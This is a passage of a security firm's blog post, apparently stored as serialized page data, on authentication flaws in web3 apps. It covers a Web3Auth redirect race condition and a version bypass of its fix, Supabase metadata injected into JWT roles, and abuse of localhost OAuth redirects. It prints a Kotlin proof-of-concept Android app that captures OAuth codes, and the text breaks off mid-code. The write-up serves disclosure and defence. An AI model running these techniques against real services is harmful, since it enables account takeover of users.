",{"type":25,"tag":162,"props":73531,"children":73534},{"href":73532,"rel":73533},"https://oauth.net/2/",[166],[73535],{"type":31,"value":73536},"OAuth2",{"type":31,"value":73538}," authentication using Google. The product employs a sophisticated authentication flow and infrastructure to maintain seamless integration with dApps.",{"type":25,"tag":606,"props":73540,"children":73542},{"id":73541},"web3auth-authentication-flow",[73543],{"type":31,"value":73544},"Web3Auth Authentication flow",{"type":25,"tag":38,"props":73546,"children":73547},{},[73548],{"type":31,"value":73549},"The Web3Auth PnP authentication flow involves a web session server that stores authentication parameters and configurations. Below is a diagram illustrating how the authentication process works:",{"type":25,"tag":38,"props":73551,"children":73552},{},[73553],{"type":25,"tag":6467,"props":73554,"children":73556},{"alt":54547,"src":73555},"/posts/web2-in-web3/auth-flow.png",[],{"type":25,"tag":38,"props":73558,"children":73559},{},[73560,73562,73568],{"type":31,"value":73561},"After the final redirect back to the dApp,  the application can use the secret token to authenticate with the service identified by the ",{"type":25,"tag":82,"props":73563,"children":73565},{"className":73564},[],[73566],{"type":31,"value":73567},"client_id",{"type":31,"value":73569},". This design ensures that you cannot use the token to authenticate against any unauthorized application.",{"type":25,"tag":38,"props":73571,"children":73572},{},[73573,73575,73581,73583,73589,73591,73598],{"type":31,"value":73574},"Additionally, it is important to note that each dApp has a whitelist of redirect URLs. The ",{"type":25,"tag":82,"props":73576,"children":73578},{"className":73577},[],[73579],{"type":31,"value":73580},"/start",{"type":31,"value":73582}," validates the ",{"type":25,"tag":82,"props":73584,"children":73586},{"className":73585},[],[73587],{"type":31,"value":73588},"redirect_url",{"type":31,"value":73590}," against the configured ",{"type":25,"tag":162,"props":73592,"children":73595},{"href":73593,"rel":73594},"https://web3auth.io/docs/dashboard-setup/whitelisting",[166],[73596],{"type":31,"value":73597},"whitelist",{"type":31,"value":73599}," to ensure it matches one of the allowed URLs.",{"type":25,"tag":606,"props":73601,"children":73603},{"id":73602},"in-transit-cryptography",[73604],{"type":31,"value":73605},"In-transit Cryptography",{"type":25,"tag":38,"props":73607,"children":73608},{},[73609,73611,73618,73620,73626,73628,73634,73636,73641,73643,73648],{"type":31,"value":73610},"The session server employs cryptography to securely send and receive authentication parameters. The ",{"type":25,"tag":162,"props":73612,"children":73615},{"href":73613,"rel":73614},"https://en.wikipedia.org/wiki/Key_(cryptography)",[166],[73616],{"type":31,"value":73617},"cryptographic key",{"type":31,"value":73619}," is derived from the ",{"type":25,"tag":82,"props":73621,"children":73623},{"className":73622},[],[73624],{"type":31,"value":73625},"sessionId",{"type":31,"value":73627},"  sent in the ",{"type":25,"tag":82,"props":73629,"children":73631},{"className":73630},[],[73632],{"type":31,"value":73633},"GET",{"type":31,"value":73635}," parameter to the ",{"type":25,"tag":82,"props":73637,"children":73639},{"className":73638},[],[73640],{"type":31,"value":73580},{"type":31,"value":73642},". Since the ",{"type":25,"tag":82,"props":73644,"children":73646},{"className":73645},[],[73647],{"type":31,"value":73625},{"type":31,"value":73649}," can be controlled, it allows us to send and receive data from the session server.",{"type":25,"tag":38,"props":73651,"children":73652},{},[73653],{"type":25,"tag":6467,"props":73654,"children":73656},{"alt":54547,"src":73655},"/posts/web2-in-web3/image-2.png",[],{"type":25,"tag":606,"props":73658,"children":73660},{"id":73659},"race-condition",[73661],{"type":31,"value":73662},"Race Condition",{"type":25,"tag":38,"props":73664,"children":73665},{},[73666,73668,73673,73675,73681,73683,73688,73690,73695],{"type":31,"value":73667},"As shown in the diagram, the configuration data from the session server is validated only during the ",{"type":25,"tag":82,"props":73669,"children":73671},{"className":73670},[],[73672],{"type":31,"value":73580},{"type":31,"value":73674}," and later used in the ",{"type":25,"tag":82,"props":73676,"children":73678},{"className":73677},[],[73679],{"type":31,"value":73680},"/end",{"type":31,"value":73682}," enpoint. This introduces a potential race condition that can be exploited if an attacker manages to modify the parameters after  validation (",{"type":25,"tag":82,"props":73684,"children":73686},{"className":73685},[],[73687],{"type":31,"value":73580},{"type":31,"value":73689},") but before  use (",{"type":25,"tag":82,"props":73691,"children":73693},{"className":73692},[],[73694],{"type":31,"value":73680},{"type":31,"value":24702},{"type":25,"tag":38,"props":73697,"children":73698},{},[73699,73701,73708,73710,73715],{"type":31,"value":73700},"To exploit this ",{"type":25,"tag":162,"props":73702,"children":73705},{"href":73703,"rel":73704},"https://portswigger.net/web-security/race-conditions",[166],[73706],{"type":31,"value":73707},"race condition",{"type":31,"value":73709},",  an attacker-controlled website can initiate the authentication flow normally. Then, it can send another request to the session server with the same ",{"type":25,"tag":82,"props":73711,"children":73713},{"className":73712},[],[73714],{"type":31,"value":73625},{"type":31,"value":73716}," but with modified malicious parameters.",{"type":25,"tag":38,"props":73718,"children":73719},{},[73720],{"type":25,"tag":9273,"props":73721,"children":73722},{},[73723],{"type":31,"value":73724},"What can be modified to achieve something impactful?",{"type":25,"tag":38,"props":73726,"children":73727},{},[73728,73730,73736,73738,73743],{"type":31,"value":73729},"The answer is quite simple if you understand how OAuth works. The attacker can simply change the ",{"type":25,"tag":82,"props":73731,"children":73733},{"className":73732},[],[73734],{"type":31,"value":73735},"redirect_uri",{"type":31,"value":73737}," parameter to point to their own website and leak the secret token from the query string. With the secret token, they can authenticate against the application defined by ",{"type":25,"tag":82,"props":73739,"children":73741},{"className":73740},[],[73742],{"type":31,"value":73567},{"type":31,"value":179},{"type":25,"tag":38,"props":73745,"children":73746},{},[73747],{"type":25,"tag":6467,"props":73748,"children":73750},{"alt":54547,"src":73749},"/posts/web2-in-web3/image-3.png",[],{"type":25,"tag":38,"props":73752,"children":73753},{},[73754],{"type":31,"value":73755},"Using this exploit, we were able to create a website capable of taking over the accounts of victims who followed the standard OAuth flow.",{"type":25,"tag":606,"props":73757,"children":73759},{"id":73758},"patch-bypass",[73760],{"type":31,"value":73761},"Patch & Bypass",{"type":25,"tag":38,"props":73763,"children":73764},{},[73765],{"type":31,"value":73766},"The vulnerability was reported and remediated on the same day (super quickly!). However, we found that the fix was not backported to older versions.",{"type":25,"tag":38,"props":73768,"children":73769},{},[73770],{"type":31,"value":73771},"To bypass the fix we were able to change the version in the URL:",{"type":25,"tag":2039,"props":73773,"children":73774},{},[73775,73786],{"type":25,"tag":2043,"props":73776,"children":73777},{},[73778,73784],{"type":25,"tag":82,"props":73779,"children":73781},{"className":73780},[],[73782],{"type":31,"value":73783},"https://auth.web3auth.io/v8/start",{"type":31,"value":73785}," (latest version)",{"type":25,"tag":2043,"props":73787,"children":73788},{},[73789,73795],{"type":25,"tag":82,"props":73790,"children":73792},{"className":73791},[],[73793],{"type":31,"value":73794},"https://auth.web3auth.io/v6/start",{"type":31,"value":73796}," (bypass)",{"type":25,"tag":38,"props":73798,"children":73799},{},[73800],{"type":31,"value":73801},"We reported this issue, and it was addressed just as quickly!",{"type":25,"tag":26,"props":73803,"children":73805},{"id":73804},"supabase-metadata-manipulation",[73806],{"type":31,"value":73807},"Supabase metadata manipulation",{"type":25,"tag":606,"props":73809,"children":73811},{"id":73810},"supabase-authentication-flow",[73812],{"type":31,"value":73813},"Supabase Authentication flow",{"type":25,"tag":38,"props":73815,"children":73816},{},[73817,73824,73826,73833],{"type":25,"tag":162,"props":73818,"children":73821},{"href":73819,"rel":73820},"https://supabase.com/docs/guides/auth",[166],[73822],{"type":31,"value":73823},"Supabase",{"type":31,"value":73825}," is a Backend-as-a-Service (BaaS) platform that provides authentication, database, and real-time APIs. The authentication process begins when a user registers or logs in. Supabase generates a ",{"type":25,"tag":162,"props":73827,"children":73830},{"href":73828,"rel":73829},"https://jwt.io/",[166],[73831],{"type":31,"value":73832},"JWT",{"type":31,"value":73834}," for the authenticated user, embedding claims such as the user ID, roles, and additional metadata (either user-provided or system-generated). This token is then returned to the client and used for subsequent API requests, during which the server validates the JWT to confirm the user’s identity and permissions.",{"type":25,"tag":606,"props":73836,"children":73838},{"id":73837},"jwt-verification",[73839],{"type":31,"value":73840},"JWT verification",{"type":25,"tag":38,"props":73842,"children":73843},{},[73844,73846,73851,73852,73858,73860,73866],{"type":31,"value":73845},"In one of our clients' systems, we discovered a vulnerability that allowed the inclusion of custom fields, such as ",{"type":25,"tag":82,"props":73847,"children":73849},{"className":73848},[],[73850],{"type":31,"value":73493},{"type":31,"value":1307},{"type":25,"tag":82,"props":73853,"children":73855},{"className":73854},[],[73856],{"type":31,"value":73857},"identity_data",{"type":31,"value":73859},", in a signup request by manipulating the input inside the ",{"type":25,"tag":82,"props":73861,"children":73863},{"className":73862},[],[73864],{"type":31,"value":73865},"\"data\": {}",{"type":31,"value":73867}," structure. These fields were then directly reflected in the issued JWT without validation.",{"type":25,"tag":38,"props":73869,"children":73870},{},[73871,73873,73879,73880,73886,73888,73894],{"type":31,"value":73872},"For example, an attacker could send a signup request with arbitrary data, such as ",{"type":25,"tag":82,"props":73874,"children":73876},{"className":73875},[],[73877],{"type":31,"value":73878},"\"role\": \"admin\"",{"type":31,"value":17090},{"type":25,"tag":82,"props":73881,"children":73883},{"className":73882},[],[73884],{"type":31,"value":73885},"\"email_verified\": true",{"type":31,"value":73887},", which would subsequently be included in the JWT claims. Additionally, it was possible to insert arbitrary fields beyond typical inputs, such as ",{"type":25,"tag":82,"props":73889,"children":73891},{"className":73890},[],[73892],{"type":31,"value":73893},"\"test\": \"test\"",{"type":31,"value":73895},", enabling us to inject arbitrary data into the final JWT token.",{"type":25,"tag":38,"props":73897,"children":73898},{},[73899],{"type":25,"tag":6467,"props":73900,"children":73902},{"alt":54547,"src":73901},"/posts/web2-in-web3/image-4.png",[],{"type":25,"tag":38,"props":73904,"children":73905},{},[73906],{"type":31,"value":73907},"In this example we are controlling the \"role\" field within the user metadata. If the application manage roles using the metadata, it would be vulnerable to a privilege escalation since anyone could inject any role there.",{"type":25,"tag":38,"props":73909,"children":73910},{},[73911],{"type":31,"value":73912},"The attacker could subsequently log in on the main platform, retrieve the token, and verify that their injected parameters persist in the JWT by submitting it to a verification endpoint. This happens because a function parseSupaBase was parsing and verifying everything generated by the JWT supabase token.",{"type":25,"tag":206,"props":73914,"children":73916},{"className":35325,"code":73915,"language":35327,"meta":7,"style":7},"function parseSupaBase(token) {\n    try {\n        const [header, payload, signature] = token.split('.');\n        const decodedHeader = JSON.parse(atob(header));\n        const decodedPayload = JSON.parse(atob(payload));\n        return { header: decodedHeader, payload: decodedPayload, signature };\n    } catch (error) {\n        console.error('Error parsing token:', error);\n        return null;\n    }\n}\n",[73917],{"type":25,"tag":82,"props":73918,"children":73919},{"__ignoreMap":7},[73920,73945,73957,74026,74075,74123,74168,74191,74228,74244,74251],{"type":25,"tag":216,"props":73921,"children":73922},{"class":6922,"line":6923},[73923,73927,73932,73936,73941],{"type":25,"tag":216,"props":73924,"children":73925},{"style":6936},[73926],{"type":31,"value":35339},{"type":25,"tag":216,"props":73928,"children":73929},{"style":7047},[73930],{"type":31,"value":73931}," parseSupaBase",{"type":25,"tag":216,"props":73933,"children":73934},{"style":6964},[73935],{"type":31,"value":1850},{"type":25,"tag":216,"props":73937,"children":73938},{"style":6947},[73939],{"type":31,"value":73940},"token",{"type":25,"tag":216,"props":73942,"children":73943},{"style":6964},[73944],{"type":31,"value":18761},{"type":25,"tag":216,"props":73946,"children":73947},{"class":6922,"line":6769},[73948,73953],{"type":25,"tag":216,"props":73949,"children":73950},{"style":6973},[73951],{"type":31,"value":73952},"    try",{"type":25,"tag":216,"props":73954,"children":73955},{"style":6964},[73956],{"type":31,"value":7241},{"type":25,"tag":216,"props":73958,"children":73959},{"class":6922,"line":6778},[73960,73964,73968,73973,73977,73982,73986,73991,73995,73999,74004,74008,74013,74017,74022],{"type":25,"tag":216,"props":73961,"children":73962},{"style":6936},[73963],{"type":31,"value":36864},{"type":25,"tag":216,"props":73965,"children":73966},{"style":6964},[73967],{"type":31,"value":26978},{"type":25,"tag":216,"props":73969,"children":73970},{"style":6947},[73971],{"type":31,"value":73972},"header",{"type":25,"tag":216,"props":73974,"children":73975},{"style":6964},[73976],{"type":31,"value":7026},{"type":25,"tag":216,"props":73978,"children":73979},{"style":6947},[73980],{"type":31,"value":73981},"payload",{"type":25,"tag":216,"props":73983,"children":73984},{"style":6964},[73985],{"type":31,"value":7026},{"type":25,"tag":216,"props":73987,"children":73988},{"style":6947},[73989],{"type":31,"value":73990},"signature",{"type":25,"tag":216,"props":73992,"children":73993},{"style":6964},[73994],{"type":31,"value":12614},{"type":25,"tag":216,"props":73996,"children":73997},{"style":6953},[73998],{"type":31,"value":266},{"type":25,"tag":216,"props":74000,"children":74001},{"style":6947},[74002],{"type":31,"value":74003}," token",{"type":25,"tag":216,"props":74005,"children":74006},{"style":6964},[74007],{"type":31,"value":179},{"type":25,"tag":216,"props":74009,"children":74010},{"style":7047},[74011],{"type":31,"value":74012},"split",{"type":25,"tag":216,"props":74014,"children":74015},{"style":6964},[74016],{"type":31,"value":1850},{"type":25,"tag":216,"props":74018,"children":74019},{"style":8205},[74020],{"type":31,"value":74021},"'.'",{"type":25,"tag":216,"props":74023,"children":74024},{"style":6964},[74025],{"type":31,"value":7797},{"type":25,"tag":216,"props":74027,"children":74028},{"class":6922,"line":7005},[74029,74033,74038,74042,74046,74050,74054,74058,74063,74067,74071],{"type":25,"tag":216,"props":74030,"children":74031},{"style":6936},[74032],{"type":31,"value":36864},{"type":25,"tag":216,"props":74034,"children":74035},{"style":6947},[74036],{"type":31,"value":74037}," decodedHeader",{"type":25,"tag":216,"props":74039,"children":74040},{"style":6953},[74041],{"type":31,"value":6956},{"type":25,"tag":216,"props":74043,"children":74044},{"style":6947},[74045],{"type":31,"value":41491},{"type":25,"tag":216,"props":74047,"children":74048},{"style":6964},[74049],{"type":31,"value":179},{"type":25,"tag":216,"props":74051,"children":74052},{"style":7047},[74053],{"type":31,"value":43175},{"type":25,"tag":216,"props":74055,"children":74056},{"style":6964},[74057],{"type":31,"value":1850},{"type":25,"tag":216,"props":74059,"children":74060},{"style":7047},[74061],{"type":31,"value":74062},"atob",{"type":25,"tag":216,"props":74064,"children":74065},{"style":6964},[74066],{"type":31,"value":1850},{"type":25,"tag":216,"props":74068,"children":74069},{"style":6947},[74070],{"type":31,"value":73972},{"type":25,"tag":216,"props":74072,"children":74073},{"style":6964},[74074],{"type":31,"value":11175},{"type":25,"tag":216,"props":74076,"children":74077},{"class":6922,"line":7110},[74078,74082,74087,74091,74095,74099,74103,74107,74111,74115,74119],{"type":25,"tag":216,"props":74079,"children":74080},{"style":6936},[74081],{"type":31,"value":36864},{"type":25,"tag":216,"props":74083,"children":74084},{"style":6947},[74085],{"type":31,"value":74086}," decodedPayload",{"type":25,"tag":216,"props":74088,"children":74089},{"style":6953},[74090],{"type":31,"value":6956},{"type":25,"tag":216,"props":74092,"children":74093},{"style":6947},[74094],{"type":31,"value":41491},{"type":25,"tag":216,"props":74096,"children":74097},{"style":6964},[74098],{"type":31,"value":179},{"type":25,"tag":216,"props":74100,"children":74101},{"style":7047},[74102],{"type":31,"value":43175},{"type":25,"tag":216,"props":74104,"children":74105},{"style":6964},[74106],{"type":31,"value":1850},{"type":25,"tag":216,"props":74108,"children":74109},{"style":7047},[74110],{"type":31,"value":74062},{"type":25,"tag":216,"props":74112,"children":74113},{"style":6964},[74114],{"type":31,"value":1850},{"type":25,"tag":216,"props":74116,"children":74117},{"style":6947},[74118],{"type":31,"value":73981},{"type":25,"tag":216,"props":74120,"children":74121},{"style":6964},[74122],{"type":31,"value":11175},{"type":25,"tag":216,"props":74124,"children":74125},{"class":6922,"line":7216},[74126,74130,74134,74139,74143,74147,74152,74156,74160,74164],{"type":25,"tag":216,"props":74127,"children":74128},{"style":6973},[74129],{"type":31,"value":19702},{"type":25,"tag":216,"props":74131,"children":74132},{"style":6964},[74133],{"type":31,"value":13542},{"type":25,"tag":216,"props":74135,"children":74136},{"style":6947},[74137],{"type":31,"value":74138},"header:",{"type":25,"tag":216,"props":74140,"children":74141},{"style":6947},[74142],{"type":31,"value":74037},{"type":25,"tag":216,"props":74144,"children":74145},{"style":6964},[74146],{"type":31,"value":7026},{"type":25,"tag":216,"props":74148,"children":74149},{"style":6947},[74150],{"type":31,"value":74151},"payload:",{"type":25,"tag":216,"props":74153,"children":74154},{"style":6947},[74155],{"type":31,"value":74086},{"type":25,"tag":216,"props":74157,"children":74158},{"style":6964},[74159],{"type":31,"value":7026},{"type":25,"tag":216,"props":74161,"children":74162},{"style":6947},[74163],{"type":31,"value":73990},{"type":25,"tag":216,"props":74165,"children":74166},{"style":6964},[74167],{"type":31,"value":22258},{"type":25,"tag":216,"props":74169,"children":74170},{"class":6922,"line":7244},[74171,74175,74179,74183,74187],{"type":25,"tag":216,"props":74172,"children":74173},{"style":6964},[74174],{"type":31,"value":19737},{"type":25,"tag":216,"props":74176,"children":74177},{"style":6973},[74178],{"type":31,"value":52380},{"type":25,"tag":216,"props":74180,"children":74181},{"style":6964},[74182],{"type":31,"value":7016},{"type":25,"tag":216,"props":74184,"children":74185},{"style":6947},[74186],{"type":31,"value":18821},{"type":25,"tag":216,"props":74188,"children":74189},{"style":6964},[74190],{"type":31,"value":18761},{"type":25,"tag":216,"props":74192,"children":74193},{"class":6922,"line":7257},[74194,74199,74203,74207,74211,74216,74220,74224],{"type":25,"tag":216,"props":74195,"children":74196},{"style":6947},[74197],{"type":31,"value":74198},"        console",{"type":25,"tag":216,"props":74200,"children":74201},{"style":6964},[74202],{"type":31,"value":179},{"type":25,"tag":216,"props":74204,"children":74205},{"style":7047},[74206],{"type":31,"value":18821},{"type":25,"tag":216,"props":74208,"children":74209},{"style":6964},[74210],{"type":31,"value":1850},{"type":25,"tag":216,"props":74212,"children":74213},{"style":8205},[74214],{"type":31,"value":74215},"'Error parsing token:'",{"type":25,"tag":216,"props":74217,"children":74218},{"style":6964},[74219],{"type":31,"value":7026},{"type":25,"tag":216,"props":74221,"children":74222},{"style":6947},[74223],{"type":31,"value":18821},{"type":25,"tag":216,"props":74225,"children":74226},{"style":6964},[74227],{"type":31,"value":7797},{"type":25,"tag":216,"props":74229,"children":74230},{"class":6922,"line":7275},[74231,74235,74240],{"type":25,"tag":216,"props":74232,"children":74233},{"style":6973},[74234],{"type":31,"value":19702},{"type":25,"tag":216,"props":74236,"children":74237},{"style":6936},[74238],{"type":31,"value":74239}," null",{"type":25,"tag":216,"props":74241,"children":74242},{"style":6964},[74243],{"type":31,"value":6967},{"type":25,"tag":216,"props":74245,"children":74246},{"class":6922,"line":7296},[74247],{"type":25,"tag":216,"props":74248,"children":74249},{"style":6964},[74250],{"type":31,"value":7311},{"type":25,"tag":216,"props":74252,"children":74253},{"class":6922,"line":7305},[74254],{"type":25,"tag":216,"props":74255,"children":74256},{"style":6964},[74257],{"type":31,"value":7874},{"type":25,"tag":606,"props":74259,"children":74260},{"id":44297},[74261],{"type":31,"value":44300},{"type":25,"tag":38,"props":74263,"children":74264},{},[74265,74267,74274,74276,74282],{"type":31,"value":74266},"Developers should avoid trusting input from their Supabase custom domain. ",{"type":25,"tag":162,"props":74268,"children":74271},{"href":74269,"rel":74270},"https://supabase.com/docs/guides/database/postgres/row-level-security",[166],[74272],{"type":31,"value":74273},"Row-Level Security",{"type":31,"value":74275}," (RLS) on Supabase should be enforced, plus important and private fields should be defined in ",{"type":25,"tag":82,"props":74277,"children":74279},{"className":74278},[],[74280],{"type":31,"value":74281},"app_metadata",{"type":31,"value":74283},". These fields must be strictly validated at every step of their creation and update processes.",{"type":25,"tag":26,"props":74285,"children":74287},{"id":74286},"oauth-in-development-environments",[74288],{"type":31,"value":74289},"OAuth in development environments",{"type":25,"tag":38,"props":74291,"children":74292},{},[74293,74295,74302,74304,74309],{"type":31,"value":74294},"After watching a ",{"type":25,"tag":162,"props":74296,"children":74299},{"href":74297,"rel":74298},"https://docs.google.com/presentation/d/1571_ZSOtfVat9u63zfn1ugTPZRN7pQsFIblcxci3czM/edit",[166],[74300],{"type":31,"value":74301},"talk",{"type":31,"value":74303}," by Luan Herrera on exploiting the logic of desktop apps that use OAuth for authentication (specifically using a localhost server), we noticed that many of our customers also permitted localhost within the ",{"type":25,"tag":82,"props":74305,"children":74307},{"className":74306},[],[74308],{"type":31,"value":73735},{"type":31,"value":74310}," parameter during the OAuth flow.",{"type":25,"tag":38,"props":74312,"children":74313},{},[74314,74316,74323],{"type":31,"value":74315},"Herrera's research highlights that if localhost is allowed as a redirect URI, it is generally not exploitable in a desktop environment because impersonating localhost without ",{"type":25,"tag":162,"props":74317,"children":74320},{"href":74318,"rel":74319},"https://www.cloudflare.com/learning/security/what-is-remote-code-execution/",[166],[74321],{"type":31,"value":74322},"Remote Code Execution",{"type":31,"value":74324}," (RCE) is impossible. However, the scenario changes in a mobile environment, where it is feasible to open a localhost web server using a malicious app, making exploitation possible.",{"type":25,"tag":38,"props":74326,"children":74327},{},[74328,74330,74336],{"type":31,"value":74329},"In one of our client's implementations, we identified that ",{"type":25,"tag":82,"props":74331,"children":74333},{"className":74332},[],[74334],{"type":31,"value":74335},"localhost:3000",{"type":31,"value":74337}," was permitted. The exploitation method is the same as demonstrated in Herrera's talk. However, we observed that localhost servers are frequently used and whitelisted by developers, not only for desktop applications but also for testing and development environments.",{"type":25,"tag":38,"props":74339,"children":74340},{},[74341],{"type":31,"value":74342},"For the exploitation, the final Google OAuth URL was constructed as follows:",{"type":25,"tag":206,"props":74344,"children":74348},{"className":74345,"code":74346,"language":74347,"meta":7,"style":7},"language-url shiki shiki-themes slack-dark","https://accounts.google.com/o/oauth2/v2/auth?client_id=redacted&scope=openid%20email%20profile&response_type=code&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fcallback%2Fgoogle&prompt=none&access_type=offline&state=2UTJ8naHVglSQQupa1jw1lugsaZr8f5M9hxZp7bxISM&code_challenge=e6_Onj804xizwJzVT5Pf8luKPbtLV-EJssR7I58UQp8&code_challenge_method=S256&service=lso&o2v=2&ddm=1&flowName=GeneralOAuthFlow\n","url",[74349],{"type":25,"tag":82,"props":74350,"children":74351},{"__ignoreMap":7},[74352],{"type":25,"tag":216,"props":74353,"children":74354},{"class":6922,"line":6923},[74355],{"type":25,"tag":216,"props":74356,"children":74357},{},[74358],{"type":31,"value":74346},{"type":25,"tag":38,"props":74360,"children":74361},{},[74362],{"type":31,"value":74363},"Since there was no public exploit, we also created a proof of concept demonstrating how a malicious APK can be created to steal the OAuth token simply by opening the malicious app. This occurs without any user interaction and results in account takeover.",{"type":25,"tag":206,"props":74365,"children":74369},{"className":74366,"code":74367,"language":74368,"meta":7,"style":7},"language-kotlin shiki shiki-themes slack-dark","class MainActivity : AppCompatActivity() {\n\n    override fun onCreate(savedInstanceState: Bundle?) {\n        super.onCreate(savedInstanceState)\n\n        // Start the Ktor web server\n        CoroutineScope(Dispatchers.IO).launch {\n            try {\n                startWebServer()\n                Log.d(\"WebServer\", \"Server started on http://localhost:3000\")\n            } catch (e: Exception) {\n                Log.e(\"WebServer\", \"Error starting server: ${e.message}\", e)\n            }\n        }\n\n        // Open the Google OAuth page\n        val googleOAuthUrl = \"https://accounts.google.com/o/oauth2/v2/auth?client_id=redacted&scope=openid%20email%20profile&response_type=code&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fcallback%2Fgoogle&prompt=none&access_type=offline&state=2UTJ8naHVglSQQupa1jw1lugsaZr8f5M9hxZp7bxISM&code_challenge=e6_Onj804xizwJzVT5Pf8luKPbtLV-EJssR7I58UQp8&code_challenge_method=S256&service=lso&o2v=2&ddm=1&flowName=GeneralOAuthFlow\"\n        val browserIntent = Intent(Intent.ACTION_VIEW, Uri.parse(googleOAuthUrl))\n        startActivity(browserIntent)\n    }\n\n    private fun startWebServer() {\n        embeddedServer(CIO, port = 3000) {\n            routing {\n                get(\"{...}\") {\n                    call.respondHtml {\n                        head {\n                            meta(charset = \"UTF-8\")\n                            meta(name = \"viewport\", content = \"width=device-width, initial-scale=1.0\")\n                            title(\"OAuth Redirect\")\n                        }\n                        body {\n                            h1 { +\"Google OAuth Redirect\" }\n                            script {\n                                +\"document.body.innerText = location.search;\"\n                            }\n                        }\n                    }\n                }\n            }\n        }.start(wait = true)\n    }\n}\n","kotlin",[74370],{"type":25,"tag":82,"props":74371,"children":74372},{"__ignoreMap":7},[74373,74400,74407,74439,74461,74468,74476,74498,74510,74522,74557,74583,74633,74640,74647,74654,74662,74684,74719,74732,74739,74746,74767,74793,74805,74826,74843,74855,74881,74920,74941,74949,74961,74986,74998,75011,75019,75026,75034,75042,75049,75079,75086],{"type":25,"tag":216,"props":74374,"children":74375},{"class":6922,"line":6923},[74376,74381,74386,74391,74396],{"type":25,"tag":216,"props":74377,"children":74378},{"style":6936},[74379],{"type":31,"value":74380},"class",{"type":25,"tag":216,"props":74382,"children":74383},{"style":7375},[74384],{"type":31,"value":74385}," MainActivity",{"type":25,"tag":216,"props":74387,"children":74388},{"style":6964},[74389],{"type":31,"value":74390}," : ",{"type":25,"tag":216,"props":74392,"children":74393},{"style":7375},[74394],{"type":31,"value":74395},"AppCompatActivity",{"type":25,"tag":216,"props":74397,"children":74398},{"style":6964},[74399],{"type":31,"value":19694},{"type":25,"tag":216,"props":74401,"children":74402},{"class":6922,"line":6769},[74403],{"type":25,"tag":216,"props":74404,"children":74405},{"emptyLinePlaceholder":16},[74406],{"type":31,"value":7642},{"type":25,"tag":216,"props":74408,"children":74409},{"class":6922,"line":6778},[74410,74415,74419,74424,74429,74434],{"type":25,"tag":216,"props":74411,"children":74412},{"style":6936},[74413],{"type":31,"value":74414},"    override",{"type":25,"tag":216,"props":74416,"children":74417},{"style":6936},[74418],{"type":31,"value":10158},{"type":25,"tag":216,"props":74420,"children":74421},{"style":7047},[74422],{"type":31,"value":74423}," onCreate",{"type":25,"tag":216,"props":74425,"children":74426},{"style":6964},[74427],{"type":31,"value":74428},"(savedInstanceState: ",{"type":25,"tag":216,"props":74430,"children":74431},{"style":7375},[74432],{"type":31,"value":74433},"Bundle",{"type":25,"tag":216,"props":74435,"children":74436},{"style":6964},[74437],{"type":31,"value":74438},"?) {\n",{"type":25,"tag":216,"props":74440,"children":74441},{"class":6922,"line":7005},[74442,74447,74451,74456],{"type":25,"tag":216,"props":74443,"children":74444},{"style":6936},[74445],{"type":31,"value":74446},"        super",{"type":25,"tag":216,"props":74448,"children":74449},{"style":6964},[74450],{"type":31,"value":179},{"type":25,"tag":216,"props":74452,"children":74453},{"style":7047},[74454],{"type":31,"value":74455},"onCreate",{"type":25,"tag":216,"props":74457,"children":74458},{"style":6964},[74459],{"type":31,"value":74460},"(savedInstanceState)\n",{"type":25,"tag":216,"props":74462,"children":74463},{"class":6922,"line":7110},[74464],{"type":25,"tag":216,"props":74465,"children":74466},{"emptyLinePlaceholder":16},[74467],{"type":31,"value":7642},{"type":25,"tag":216,"props":74469,"children":74470},{"class":6922,"line":7216},[74471],{"type":25,"tag":216,"props":74472,"children":74473},{"style":6927},[74474],{"type":31,"value":74475},"        // Start the Ktor web server\n",{"type":25,"tag":216,"props":74477,"children":74478},{"class":6922,"line":7244},[74479,74484,74489,74494],{"type":25,"tag":216,"props":74480,"children":74481},{"style":7047},[74482],{"type":31,"value":74483},"        CoroutineScope",{"type":25,"tag":216,"props":74485,"children":74486},{"style":6964},[74487],{"type":31,"value":74488},"(Dispatchers.IO).",{"type":25,"tag":216,"props":74490,"children":74491},{"style":7047},[74492],{"type":31,"value":74493},"launch",{"type":25,"tag":216,"props":74495,"children":74496},{"style":6964},[74497],{"type":31,"value":7241},{"type":25,"tag":216,"props":74499,"children":74500},{"class":6922,"line":7257},[74501,74506],{"type":25,"tag":216,"props":74502,"children":74503},{"style":6973},[74504],{"type":31,"value":74505},"            try",{"type":25,"tag":216,"props":74507,"children":74508},{"style":6964},[74509],{"type":31,"value":7241},{"type":25,"tag":216,"props":74511,"children":74512},{"class":6922,"line":7275},[74513,74518],{"type":25,"tag":216,"props":74514,"children":74515},{"style":7047},[74516],{"type":31,"value":74517},"                startWebServer",{"type":25,"tag":216,"props":74519,"children":74520},{"style":6964},[74521],{"type":31,"value":11687},{"type":25,"tag":216,"props":74523,"children":74524},{"class":6922,"line":7296},[74525,74530,74535,74539,74544,74548,74553],{"type":25,"tag":216,"props":74526,"children":74527},{"style":6964},[74528],{"type":31,"value":74529},"                Log.",{"type":25,"tag":216,"props":74531,"children":74532},{"style":7047},[74533],{"type":31,"value":74534},"d",{"type":25,"tag":216,"props":74536,"children":74537},{"style":6964},[74538],{"type":31,"value":1850},{"type":25,"tag":216,"props":74540,"children":74541},{"style":8205},[74542],{"type":31,"value":74543},"\"WebServer\"",{"type":25,"tag":216,"props":74545,"children":74546},{"style":6964},[74547],{"type":31,"value":7026},{"type":25,"tag":216,"props":74549,"children":74550},{"style":8205},[74551],{"type":31,"value":74552},"\"Server started on http://localhost:3000\"",{"type":25,"tag":216,"props":74554,"children":74555},{"style":6964},[74556],{"type":31,"value":7107},{"type":25,"tag":216,"props":74558,"children":74559},{"class":6922,"line":7305},[74560,74565,74569,74574,74579],{"type":25,"tag":216,"props":74561,"children":74562},{"style":6964},[74563],{"type":31,"value":74564},"            } ",{"type":25,"tag":216,"props":74566,"children":74567},{"style":6936},[74568],{"type":31,"value":52380},{"type":25,"tag":216,"props":74570,"children":74571},{"style":6964},[74572],{"type":31,"value":74573}," (e: 